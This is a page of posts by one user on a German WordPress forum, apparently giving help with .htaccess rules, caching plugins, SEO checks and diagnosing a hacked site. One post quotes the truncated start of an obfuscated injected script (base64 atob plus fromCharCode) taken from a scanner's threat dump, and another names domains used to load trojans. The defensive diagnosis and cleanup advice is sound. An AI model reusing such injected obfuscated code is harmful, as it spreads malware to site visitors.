Beiträge von b3317133

    [COLOR=#0000ff]RewriteCond[/COLOR] [FONT=courier new]%{HTTP_HOST}[/FONT] [COLOR=#008000](www\.)?thailand-seite.de[/COLOR][COLOR=#ff0000]/Geschichten/

    [/COLOR]Die [COLOR=#0000ff]Bedingung[/COLOR], dass[FONT=courier new]%{HTTP_HOST}[/FONT] das gleiche ist wie [COLOR=#008000]Hostname[/COLOR][COLOR=#ff0000]/irgendwas-anderes/[/COLOR] kann und wird niemals erfüllt werden.

    Mehr dazu findest Du sicher in einem Apache-Forum o.ä., das hat mit WordPress-Konfiguration nichts zu tun.

    Hier sieht es so aus:

    [ATTACH=CONFIG]18541[/ATTACH]

    Das bedeutet, dass es auf jeden Fall auf dem Server einen Hack gegeben hat. Ob/wann der ggf. vollständig oder unvollständig bereinigt wurde, oder ob der Hack in irgendeiner Form noch aktiv ist, kann man "von aussen" nicht feststellen, die Scan-Ergebnisse und v.a. die o.g. Meldungen Deiner Besucher lassen es allerdings vermuten...

    In der "WayBack Machine" kann man den im Screenshot sichtbaren Hack auch noch im HTML-Quelltext sehen, z.B. [FONT=courier new]view-source:https://web.archive.org/web/2017041621…inger.de/ueber/[/FONT]

    Grundsätzlich würde ich schon gerne eine Cache Plugin verwenden. Was ist die Lösung? Was würdest Du machen?

    Würde in dem Fall ein Plugin so verwenden, dass ich alle Einstellungsänderungen, die ich mache, vorher verstehe und nachher nachvollziehen kann.

    Direkt nach der Installation mit Standardeinstellungen und ohne irgendwelche extra Zusatz-Plugins funktionieren "WP Super Cache" u.ä. in der Regel einwandfrei.

    Vermutlich liegt ein Hack vor. Ein externer Scanner meldet einige sehr verdächtige Daten, sehe diese Daten nicht direkt im Code hier bei mir, aber das heisst nichts, evtl. werden/wurden diese Daten nur unter bestimmten Umständen vom Server/Hack ausgeliefert, z.B. bestimmtes Betriebssystem, bestimmter Browser, Referer o.ä.

    Potentially Suspicious files: 10 -> Threat dump: View code, z.B.

    Zitat

    [[<script type='text/javascript' language='javascript' > var GFGCRMKCIZ = atob('dmFyIE5PREhURkNIQlEgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTI3IC0gOSwgMTAxIC0gNCwgMTIxIC0gNywg...

    Seltsam, lt. Quelltext einer nicht vorhandenen Seite, z.B. [FONT=courier new]view-source:https://www.blubonbon.com/asasddas[/FONT] sieht es so aus, als wäre das Plugin nach wie vor präsent, sonst wäre da kein [FONT=courier new]<!-- Page not cached by WP Super Cache. 404. -->[/FONT] ganz am Ende.

    Firefox meint zudem "Die Webseite, die Sie öffnen möchten, kann nicht angezeigt werden, da sie eine ungültige oder unbekannte Form der Kompression verwendet." - auch das deutet ggf. auf ein Cache-Problem hin oder z.B. falsche Einträge in der [FONT=courier new].htaccess[/FONT] hin. Benenne die mal testweise um.

    es kommt auch nur wenn man die Seite über die Google Suche aufruft.

    Beispiel? Wie genau kann man das Problem nachstellen?

    Herausfinden, ob/wie man gehackt wurde, kann jemand, der sich etwas auskennt, am besten in Server-Logfiles, im PHP/JS-Quellcode von WordPress, dem Theme, den Plugins usw., und in der Datenbank.

    Ergänzung: Konnte den Effekt grade nachvollziehen, die Installation ist definitiv gehackt.

    So geht es weiter: Gehackte Dateien analysieren, über Server-Logs feststellen, wann/woher diese Dateien kamen, Lücke identifizieren, Lücke schliessen. Alle Systemdateien von WordPress ersetzen, dafür wp-admin/ und wp-includes/ komplett löschen. Alle Plugins durch saubere Versionen ersetzen, dafür alle Ordner in wp-content/plugins/ löschen, gleiches gilt für die Themes. Alle PHP-Dateien in wp-content/uploads/ suchen/löschen. Alle Passwörter ändern, FTP, MySQL, WordPress Accounts, usw.

    Kann mir jemand einen Tipp geben bitte? Ich hätt's gern grüner


    Verwende reinen Text auf einer leeren Seite ohne Spalten und sonstiges.. ;)

    Diese "grün" Anzeigen in irgendwelchen SEO-Plugins sind allenfalls Anhaltspunkte für Standardfälle. Sobald (wie in diesem Fall) komplexeres Layout oder ein Page Builder usw. zum Einsatz kommt, stösst ein Plugin an technische Auswertungsgrenzen und solche Anzeigen sind dann oft eher schädlich als nützlich, wenn man/frau krampfhaft auf "grün" hinarbeitet u.ä. - schalte sie am besten ab.

    Vermutlich stört sich der "SEO-Check" an sowas hier:

    Code
    <strong class='logo'><a href='https://xxx/'><img height='100' width='300' src='https://xxx.png' alt='xxx' /></a></strong>


    Wir findet man sowas? Am besten, indem man sich einfach den HTML-Quelltext der Seite anschaut, ohne irgendwelche "Tools".

    Stört sowas? Dazu gibt es sicher unterschiedliche Ansichten, die Nutzung des Tags an der Stelle ist eher "ungewöhnlich", befrage mal den Theme-Autor dazu, evtl. gibt es Gründe durch Theme-Options bzgl. "mit/ohne Logo" usw.

    Soll man "SEO-Checks" und deren "Tipps" als die "reine Wahrheit" ansehen? Sicherlich nicht...

    Und wieder ist das Forum gehackt und versucht Trojaner von den Domains [FONT=courier new]wordc.ga[/FONT] und [FONT=courier new]mwor.gq[/FONT] nachzuladen... ohne Worte.

    forum.wpde.org/clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js?v=425

    Ohne die Plugins zu kennen, würde ich mal sowas vermuten:

    [FONT=courier new]do_action( 'slideshow_deploy', CFS()->get( 'getslideshow' ) );
    [/FONT]
    Falls mit dem "Slideshow-Plugin" dieses hier gemeint sein sollte, das empfiehlt sich ggf. aus Alters- und Kompatibilitätsgründen eher nicht mehr.[FONT=courier new]
    [/FONT]

    Könnte auch an einem bisher genutzten Nebeneffekt des verwendeten Yoast SEO liegen, die bei Yoast verändern gern mal was, siehe z.B. im Changelog von 7.0:

    Zitat

    - Introduces a new setting to redirect attachment URLs. Previously, we had an option to redirect attachment URLs to their post parent. ... This new setting redirects all attachment URLs to the URL of the original image / media item. This is all explained on the new Media tab under Search Appearance. This setting is enabled by default for new installations.